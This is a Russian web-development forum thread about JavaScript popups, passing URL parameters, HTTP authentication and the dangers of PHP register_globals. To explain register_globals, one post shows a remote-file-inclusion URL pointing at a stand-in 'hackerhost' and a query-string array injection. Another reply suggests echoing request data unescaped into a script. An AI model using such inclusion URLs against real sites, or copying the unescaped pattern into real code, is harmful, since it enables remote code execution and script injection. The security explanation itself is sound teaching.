Часовой пояс: UTC + 3 часа




Начать новую тему Новая тема / Ответить на тему Ответить  Сообщений: 1267 • Страница 6 из 64<  1 ... 3  4  5  6  7  8  9 ... 64  >
  Пред. тема | След. тема 
В случае проблем с отображением форума, отключите блокировщик рекламы
Автор Сообщение
 

Advanced member
Статус: Не в сети
Регистрация: 09.06.2003
Откуда: USSR
_Psih Тоже нормально, хотя для начинающих более непонятна чем моя :)



Партнер
 

Member
Статус: Не в сети
Регистрация: 27.07.2005
Я создаю временно окошко следующим образом:

<script language="JavaScript">function openwindow() {var url="openwindow.shtml";myWin=window.open(url,"openwindow","width=300,height=150,resizable=no,scrollbars=no,menubar=no,toolbar=no");}</script>

<a href=javascript:delpr()>OPEN</a>

У меня очень большой вопрос, Как при открытии этого окна заставить перейти по определенной ссылке главное окно?
Подскажите пожалуйсто.

Добавлено спустя 54 минуты, 10 секунд:
И еще очень нужно узнать: на многих сайтах видела "секретные" формы ввода логина и пароля...
Типа пользователь нажимает на <a href=что-то>.</a> и ему открывается виндовское окошечко с предложением ввода логина и пароля (что-то типа vpn)... Подскажите функцию для этого...


 

Member
Статус: Не в сети
Регистрация: 03.01.2004
Откуда: Питер
Народ, подскажите плз. как с помощью JS передать параметр через ссылку с одной страницы на другую и принять его?
К примеру на стр1 есть переменная n, как передать ее через ссылку на другую страницу и принять ее?
ЗЫ давно уже ищу решение, нашел только как передать, щас не помню точно но вроде через ? делается...

_________________
Здесь так мало тех, с кем легко говорить,
Еще меньше тех, с кем не страшно молчать (c)


 

Member
Статус: Не в сети
Регистрация: 02.08.2005
Откуда: Казань
ElMory
Цитата:
И еще очень нужно узнать: на многих сайтах видела "секретные" формы ввода логина и пароля...
Типа пользователь нажимает на <a href=что-то>.</a> и ему открывается виндовское окошечко

А это уже элементарная HTTP-авторизация. Это уже настраивается на уровне конфигурации сервера, например в .htaccess. Так называемые "защищенные" файлы или каталоги. Скрипты тут не причем.

Lord_of_Darkness
Тут разве что передать переменную из Javascript в сессию PHP, или через GET, или даже POST путем подстановки ее в hidden-поле.. Тогда понадобится только в начале проинициализировать переменную в JS на странице, которой она передалась, распечатав ее. Например так:
Код:
<script>
  myVar = <?=$_REQUEST['jsvar']?>
  ....
  // Работаем с myVar
</script>

_________________
Feci quod potui, faciant meliora potentes.


 

Member
Статус: Не в сети
Регистрация: 27.07.2005
Moduvator
Это что-бы получить дополнительный доступ к динамическому сайту........
Можно поподробней???


 

Member
Статус: Не в сети
Регистрация: 11.03.2003
Здраствуйте!! у меня возникла следующая трудность... Я формирую страничку - счёт фатуру из таблицы(SQL)... так вот возниклас следующая проблемма т.к. это документ то он должен соответствовать образцу и образец такого вида например:


Поставщик: ЗАО Ремпуть111111111111111111111111111111
Покупатель: АО ССГПО

как сделать чтобы правый столбец всегда на доступную шырину был подчёркнут не зависимо от длины текста?

_________________
АМД РУЛЕЗЗЗ НАВСЕГДА!!!!!


 

Member
Статус: Не в сети
Регистрация: 28.03.2005
Откуда: Латвия, Рига
Код:
<?php
$db = mysql_connect('host', 'user', 'pass');
mysql_select_db('my_database');
$res = mysql_query("SELECT * FROM my_table WHERE somefield = 'someValue'");
// если запись только одна, то тогда можно так:
$data = mysql_fetch_assoc($res);
echo 'Производитель: <b>'.$data['имя_поставщика'].'</b><br>';
echo 'Покупатель:    <b>'.$data['имя_покупателя'].'</b>';
// и.т.д.
?>

Думаю далее идея ясна :)

Добавлено спустя 38 секунд:
ElMory писал(а):
Moduvator
Это что-бы получить дополнительный доступ к динамическому сайту........
Можно поподробней???

Что ты подразумеваешь под словом "динамический доступ" ?


 

Member
Статус: Не в сети
Регистрация: 27.07.2005
_Psih
1. Есть такой сайтик www.pgpru.com Так вот там в левом верхнем углу была точечка, при нажатии на которую открывалась менюшка (не страница и не всплывающее окно) с просьбой ввести логин и пароль...

2.
Я создаю временно окошко следующим образом:

<script language="JavaScript">function openwindow() {var url="openwindow.shtml";myWin=window.open(url,"openwindow","width=300,height=150,resizable=no,scrollbars=no,menubar=no,toolbar=no");}</script>

<a href=javascript:delpr()>OPEN</a>

У меня очень большой вопрос, Как при открытии этого окна заставить перейти по определенной ссылке главное окно?
Не знаешь?


 

Member
Статус: Не в сети
Регистрация: 28.03.2005
Откуда: Латвия, Рига
ElMory писал(а):
_Psih
1. Есть такой сайтик www.pgpru.com Так вот там в левом верхнем углу была точечка, при нажатии на которую открывалась менюшка (не страница и не всплывающее окно) с просьбой ввести логин и пароль...

2.
Я создаю временно окошко следующим образом:

<script language="JavaScript">function openwindow() {var url="openwindow.shtml";myWin=window.open(url,"openwindow","width=300,height=150,resizable=no,scrollbars=no,menubar=no,toolbar=no");}</script>

<a href=javascript:delpr()>OPEN</a>

У меня очень большой вопрос, Как при открытии этого окна заставить перейти по определенной ссылке главное окно?
Не знаешь?

1-е это обычная ссылка там же...

2-е: в форме ввода логина напиши у тега form так:
Код:
...
<form action="myscript.php" method="post" onsubmit="window.opener.location.reload();">
...

непомню точно был там reload или refresh, но примерно так


 

Member
Статус: Не в сети
Регистрация: 03.01.2004
Откуда: Питер
Moduvator А для этого поддержка пхп сервером не нужна случаем? Ато у меня на ньюмайле не пашет. Вот как сделал:
первая страница
Код:
<html>
<SCRIPT LANGUAGE="JavaScript">
 var n=12;
</script>
<head>
   <title>New document</title>
</head>
<body>
<a href="tst2.html?n=4">CLICK!</a>
</body>
</html>


Вторая:
Код:
<html>
<SCRIPT LANGUAGE="JavaScript">
  var n=10;
  n = <?=$_REQUEST['jsvar']?>
  document.write('<h1>n= '+n+'</h1>'); 
</script>
<head>                                 
   <title>New document</title>
</head>
<body>
</body>
</html>


Говорит синтаксическая ошибка :(

_________________
Здесь так мало тех, с кем легко говорить,
Еще меньше тех, с кем не страшно молчать (c)


 

Member
Статус: Не в сети
Регистрация: 28.03.2005
Откуда: Латвия, Рига
Код:
n = <?=$_GET['jsvar']?>;

сервер должен иметь установленный PHP


 

Есть такой вопрос
Почему в начале статьи автор намекает на то что использовать register_globals плохо?
Обьясните идиоту а?
в чем конкретно разница?

Добавлено спустя 2 минуты, 7 секунд:
Lord_of_Darkness
переименуй файлы из .html в .php


 

Member
Статус: Не в сети
Регистрация: 02.08.2005
Откуда: Казань
Nec
Не вдаваясь в детали - со включеным register_globals скрипты получаются более уязвимыми. А во-вторых, и это самое важное - сценарий, корректно работающий с register_globals=off будет корректно работать и с включенным параметром, но не наоборот.

_________________
Feci quod potui, faciant meliora potentes.


 

Очень сомнительно по поводу пункта 1.
и каким это образом более уязвимые?
в обоих случаях ведь в уязвимых местах делается проверка на содержание переменной. типа там ааддслеши стриптэги проверко на число... и т.п.
ведь вредоносный код в переменную запихивают не в зависимости от регистер_глобалс

короче по моему эт надуманная проблема.

есть контраргумент конкретный?


 

Member
Статус: Не в сети
Регистрация: 03.01.2004
Откуда: Питер
Nec, _Psih у меня хостинг пхп не поддерживает.
Дык значит JS не обойтись? Обидно, ну да ладно...
ЗЫ спасибо всем за помощь.

_________________
Здесь так мало тех, с кем легко говорить,
Еще меньше тех, с кем не страшно молчать (c)


 

Member
Статус: Не в сети
Регистрация: 18.11.2002
Откуда: не вернуться
Nec register_globals позволяет задавать не только те переменные которые вы проверяете а все что только можно это и приводит к повышеной опасности так что ваши доводы пожалуй слегка легкомысленны и я даже сказал бы "глуповаты" (не в обиду было сказано)

_________________
Летели гуси-лебеди, а им навстречу - воробьи-пингвины и соловьи-страусы...


 

Member
Статус: Не в сети
Регистрация: 02.08.2005
Откуда: Казань
Nec
Первый пример уязвимости:
Код:
<?
//*** Здесь устанавливается переменная $root
//*** ....
include $root."/library.php";
?>

Если в коде выше переменная $root по ошибке не проинициализируется (это может случиться по разным причинам), злоумышленник сможет запустить на сервере любой код, открыв следующий адрес в броузере:
http://example.com/script.php?root=http://hackerhost

Конечно, этот пример может показаться надуманным. Таким он по сути и является: эта проблема может проявиться только в сложных скриптах, насчитывающих несколько файлов, включающих друг друга. Там бывает весьма непросто уследить за глобальными переменными. Например, в этом самом форуме - phpBB неоднократно находились и устранялись уязвимости подобного рода.

Более простой пример - массивы. Многие люди просто пишут в своих программах
Код:
artefacts['rabbit'] = "white";
artefacts['cat'] = "black";

Они не задумываются, что надо бы очистить массив $artefacts, полагая, что он и так пуст в начале программы. Корректный же код должен выглядеть так:
Код:
artefacts = array();
artefacts['rabbit'] = "white";
artefacts['cat'] = "black";

К чему ведет пропуск artefacts = array(); в начале скрипта? Да к тому, что передав специально подобраную строку запроса, хакер сможет добавить в массив произвольные элементы. Например, он запустит сценарий так:
http://example.com/script.php?artefacts[reboot]=yes
При этом в программе с пропущеным обнулением массива, в него будут помещены три элемента, а не два. Скрипт может на это никак не расчитывать, что в свою очередь может породить проблемы с безопасностью.

_________________
Feci quod potui, faciant meliora potentes.


 

Member
Статус: Не в сети
Регистрация: 18.11.2002
Откуда: не вернуться
Moduvator писал(а):
этот пример может показаться надуманным

Абсолютно реальный (в одной из старых версий PunBB)
Moduvator писал(а):
Более простой пример - массивы

Тоже далеко ходить не надо phpBB 2.0.8 (faq.php)

_________________
Летели гуси-лебеди, а им навстречу - воробьи-пингвины и соловьи-страусы...


 

Member
Статус: Не в сети
Регистрация: 02.08.2005
Откуда: Казань
Рассмотрим также в каком порядке записываются данные в массив $_REQUEST, а также в глобальные переменные при включенном register_globals. Этот порядок вообще говоря важен.

Например, пусть у нас есть параметр А=10, поступивший из QUERY_STRING, параметр А=20 из POST-запроса, и cookie A=30. По умолчанию трансляция выполняется в подрядке GET-POST-COOKIE (GPC), причем каждая следующая переменная перекрывает предыдущее свое значение. Поэтому в нашем примере в ячейке массива $_REQUEST['A'] будет значение 30.

В режиме register_globals в глобальные переменные также попадут переменные окружения. Записываются они в соответствии со схемой ENVIRONMENT-GET-POST-COOKIE (EGPC). Иными словами, переменные окружения в режиме register_globals перекрываются даже GET-данными, и злоумышленник может легко подделать любую из них, передав соответствующую QUERY_STRING при запуске сценария. Поэтому, если мы хотим получить доступ к переменным окружения, то обращаться к ним следует либо через массив $_SERVER или через функцию getenv(), чтобы избежать неприятностей.

А включенный режим register_globals провоцирует программиста "лениться", просто обращаясь к глобальным переменным.. К чему это может привести - думаю, вы догадываетесь сами..

_________________
Feci quod potui, faciant meliora potentes.


 

Member
Статус: Не в сети
Регистрация: 03.01.2004
Откуда: Питер
Здравствуйте, это снова я :) Но на этот раз с ответом на свой вопрос. Как горица кто ищет - тот всегда ченить накопает...
Вот нашел как параметр передать и принять
Код:
Q: Как передать параметры с одной страницы на другую?
A:
--- Файл page1.htm ---
<html>
<head>
<title>1st page</title>
</head>
<body>
<!--
передаем параметры со значениями value1 и value2 на страницу

  page2.htm
пары параметр-значение разделяются символом &
-->
<a href="page2.htm?param1=value1&param2=value2">Go to 2nd page</a>
</body>

</html>

--- Файл page2.htm ---

<html>

<head>
<title>2nd page</title>
<script language="javascript" type="text/javascript">
<!--
/* Функция считывает параметр по имени */
function getPar(name)
{
paramStr = window.location.search;
begin = paramStr.indexOf(name) + name.length + 1;
end = paramStr.indexOf('&', begin);
if(end == -1) end = paramStr.length;
return unescape(paramStr.substring(begin, end));
}
//-->
</script>
</head>

<body>
<script language="javascript" type="text/javascript">
<!--
/* Считываем параметры */
var s = 'Parameters from 1st page:<br><br>';
s += 'Param1 = ' + getPar('param1') + '<br>';
s += 'Param2 = ' + getPar('param2');
/* Вывод в браузер */
document.write(s);
//-->
</script>
</body>

</html>

Причем в самом неожиданном месте - в FAQ на хоботе :)
А как это выглядит в действии можно посмотреть тут

_________________
Здесь так мало тех, с кем легко говорить,
Еще меньше тех, с кем не страшно молчать (c)


Показать сообщения за:  Поле сортировки  
Начать новую тему Новая тема / Ответить на тему Ответить  Сообщений: 1267 • Страница 6 из 64<  1 ... 3  4  5  6  7  8  9 ... 64  >
-

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Перейти:  
Создано на основе phpBB® Forum Software © phpBB Group
Русская поддержка phpBB | Kolobok smiles © Aiwan